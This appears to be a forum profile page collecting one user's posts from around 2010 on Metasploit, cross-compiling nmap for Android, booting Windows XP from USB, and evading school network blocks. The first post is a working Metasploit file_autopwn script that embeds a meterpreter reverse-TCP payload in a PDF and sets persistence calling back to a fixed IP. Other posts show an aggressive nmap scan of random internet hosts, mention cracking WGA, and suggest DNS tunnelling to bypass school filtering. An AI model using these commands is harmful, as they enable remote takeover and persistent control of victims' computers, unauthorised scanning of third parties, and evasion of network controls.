Jump to content

operat0r_001

Active Members
  • Posts

    327
  • Joined

  • Last visited

  • Days Won

    1

Posts posted by operat0r_001

  1. example output: http://rmccurdy.com/scripts/msf_shells/

    Metasploit auxilary file_autopwn module - Video Tutorial

    http://www.backtrack-linux.org/forums/back...o-tutorial.html

    rm -Rf /tmp/1

    mkdir /tmp/1

    rm -Rf ~/.msf3

    wget -O /tmp/file3.pdf https://www1.nga.mil/Newsroom/PressReleases...es/nga10_02.pdf

    ./msfconsole

    db_driver sqlite3

    db_create pentest11

    # setting the LHOST to non IP can cause issues

    setg LHOST 75.139.158.51

    setg LPORT 21

    # I just need the files I dont care if the http server ever runs ..

    setg SRVPORT 21

    # defualt is 3333

    setg LPORT_WIN32 21

    setg INFILENAME /tmp/file3.pdf

    use auxiliary/server/file_autopwn

    set OUTPATH /tmp/1

    set URIPATH /msf

    set SSL true

    set ExitOnSession false

    set PAYLOAD windows/meterpreter/reverse_tcp

    setg PAYLOAD windows/meterpreter/reverse_tcp

    set AutoRunScript persistence -r 75.139.158.51 -p 21 -A -X -i 30

    run

  2. NMAP FOR ANDROID CROSS COMPILE ARM

    # from android root prompt

    wget http://rmccurdy.com/nmap.sh

    sh nmap.sh

    cd /data/local/bin

    nmap -v -iR 50 -PN -p 80 -n -A

    This MAY work for other platforms but tested on cygonmod as of 2/18/2010 on

    Android G1 plan to APK package this up with other security tools

    ruby/metasploit etc ..

    • SYN scans may not REALLY be working … along with other ‘features’ of nmap ..

    • Copy eveything in http://rmccurdy.com/stuff/G1/BINS/NMAP/ to

    /data/local/bin on the Android and cd /data/local/bin

    • You may need to ‘mount -o remount / /` and put sh or bash ( the busybox bash ) in /bin/sh

    • Or alternative export SHELL=/system/bin/sh may work ..

    http://delicious.com/operat0r/android reference

    • Some tips for cross compiling:

    - Start with simple! bash or ‘hello world’

    - Make sure the file is ARM / STATIC

    nmap: ELF 32-bit LSB executable, ARM, version 1 (SYSV), for GNU/Linux 2.6.14, statically linked, not stripped

    - If you get ‘not found’ it may be the /bin/sh issue or missing libs

    - You can use strace and gdb from my site or http://ortegaalfredo.googlepages.com/android

    -

    For nmap and others I had to pre compile the libs and or hack up the

    configure and/or make file so if something fails try to compile each

    lib in the folder take it folder by folder

    EXAMPLE OUTPUT:

    uname -a

    Linux localhost 2.6.29.6-cm42 #11 PREEMPT Sun Jan 3 23:10:50 EST 2010 armv6l GNU

    /Linux

    #

    Starting Nmap 4.01 ( http://www.insecure.org/nmap/ ) at 2010-02-18 19:04 UTC

    Warning: OS detection will be MUCH less reliable because we did not find at lea

    st 1 open and 1 closed TCP port

    Interesting ports on diecastaircraftshop.com (63.249.18.249):

    PORT STATE SERVICE VERSION

    21/tcp open tcpwrapped

    25/tcp open smtp?

    80/tcp open http Microsoft IIS webserver 7.0

    443/tcp open https?

    Device type: general purpose

    Running (JUST GUESSING) : FreeBSD 5.X (85%)

    Aggressive OS guesses: FreeBSD 5.3-STABLE (85%)

    No exact OS matches for host (test conditions non-ideal).

    Uptime 43.977 days (since Tue Jan 5 19:39:44 2010)

    Service Info: OS: Windows

    Nmap finished: 1 IP address (1 host up) scanned in 141.397 seconds

    #

    MINI HOWTO:

    # you need sun-java5-jdk

    echo 'deb http://us.archive.ubuntu.com/ubuntu/ jaunty multiverse' >> /etc/apt/sources.list

    echo 'deb http://us.archive.ubuntu.com/ubuntu/ jaunty-updates multiverse ' >> /etc/apt/sources.list

    apt-get update

    apt-get install build-essential -y

    apt-get install m4 -y

    aptitude install git-core git jfsutils xfsprogs quota isdnutils-base nfs-common oprofile -y

    apt-get install sun-java5-jdk -y

    # toolchain for cross compile

    wget "http://www.codesourcery.com/sgpp/lite/arm/portal/package3696/public/arm-none-linux-gnueabi/arm-2008q3-72-arm-none-linux-gnueabi-i686-pc-linux-gnu.tar.bz2"

    http://zenmachine.wordpress.com/cross-comp...not-so-zen-way/

    http://android-dev.g.hatena.ne.jp/takuma104/

    # download nmap-4.01.tar.gz

    # precompile dftables cd ./libpcre/ ; ./configure ; make;cp dftables /usr/local/sbin/

    # make clean and cp /usr/local/sbin/dftables ./libpcre/

    # precompile libpcap I got libpcap-0.7.1 to compile OK for AM '

    --with-libpcap=/home/operat0r/libpcap-0.7.1/ ' change to your path

    # before you make vi the Main Make file to STATIC = -static

    # my last line after make looked like:

    arm-none-linux-gnueabi-g++ -Llibpcap -Lnbase -Lnsock/src/ -static -o nmap main.o

    nmap.o targets.o tcpip.o nmap_error.o utils.o idle_scan.o osscan.o

    output.o scan_engine.o timing.o charpool.o services.o protocols.o

    nmap_rpc.o portlist.o NmapOps.o TargetGroup.o Target.o

    FingerPrintResults.o service_scan.o NmapOutputTable.o MACLookup.o tty.o

    nmap_dns.o -lnbase -lnsock libpcre/libpcre.a -lpcap

    libdnet-stripped/src/.libs/libdnet.a -lm

    export ac_cv_linux_vers=2.6.31

    export CC=/usr/local/arm-2008q3/bin/arm-none-linux-gnueabi-gcc -static

    export LD=/usr/local/arm-2008q3/bin/arm-none-linux-gnueabi-ld

    export AR=/usr/local/arm-2008q3/bin/arm-none-linux-gnueabi-ar

    export RANLIB=/usr/local/arm-2008q3/arm-none-linux-gnueabi/bin/ranlib

    export PATH=$PATH:/usr/local/arm-2008q3/bin

    export PATH=$PATH:/usr/local/arm-2008q3/

    export PATH=$PATH:/usr/local/arm-2008q3/lib

    export ac_cv_func_getpgrp_void=yes

    export ac_cv_func_setpgrp_void=yes

    ./configure --host=arm-none-linux-gnueabi --target=arm-none-linux-gnueabi

    --with-libpcap=/home/operat0r/libpcap-0.7.1/ --without-nmapfe

    --with-pcap=linux

  3. No and no ?? its not a theory ... usboot.org .. you would only need to remember WPA key and if you and the WGA can be crack easy this has been tested on 4 different desktop and 5 different laptops I can only assume you need to keep the original IMAGE because its installing drivers every time you change the system and I assume that would cause problems eventually but none for me so far I got a blue screen but it worked fine on reboot for one of the desktops

  4. windows XP SP3 installed to USB usboot with NIC and WIFI driverpacks

    *** THIS IS NOT BART,ERD OR UBCD4WIN ETC THIS IS A REAL FULL XP PRO SP3 INSTALLED AND BOOTING FROM USB DRIVE ***

    This is working and tested USB boot image using partimage

    * get a 4gig or higher usb drive

    * download RMPrepUSB and format fat32 with boot

    * make sure you can boot from the USB device

    * extract the zip using 7-zip.org etc

    * use partimage to dump the ~2 gig image to the usb drive etc

    * http://www.sysresccd.org/Screenshots for partimage if you do not have it also on Backtrack or any number of live linux distros

    this is how I did it thank usboot.org

    * the host mashine MUST have NFTS partiton on it for this to work it uses drive shadowning etc to clone the C:

    * made sure the USB drive was bootable

    * formated the USB drive FAT32 not on VMware but on the host mashine

    * did base install of my windows XP with driverpacks on a VM

    * extract the NIC and WIFI drivers from driverpacks.net

    * ran phase 1-3 ok on the VM

    * you can even put this on cell phone and boot windows from minisd etc .. :)

    * the image can be pushed and booted in under 4min on a USB or HDD for a quick hack

    rmccurdy.com/usboot.txt

    -o p r e a t 0 r - r m c c u r d y . c o m

  5. random psycho babble

    * not sure but something about flash media over say 8gigs is 'different' maybe <8 is flash and >8 is 'removal disk' I just have had issues with boot/etc with larger flash drives

    * as far as USB forensics for windows I use HandyRecovery.exe GetDataBack for NTFS portable.exe GetDataBack for FAT portable.exe (PhotoRec - CGSecurity)

    * also look into dd_rhelp but normally flash works or does not so its more a matter of what tools to aim at it then reading from it with IDE/SATA you can buy PCI cards that can read at a lower level

    * for more info pop it in a *nix box and google the device is picksup

    to answer your Q: lookinto WMI you can monitor and query event logs etc anything ... you could

    http://www.google.com/search?q=GPO+%22usb+flash%22

  6. you need to say something about DNS .. most school bloc via DNS so you can tunnel all you want .. dns still goes over local LAN.

    * about:config fwd dns

    * also say something about portaputty and portable firefox

×
×
  • Create New...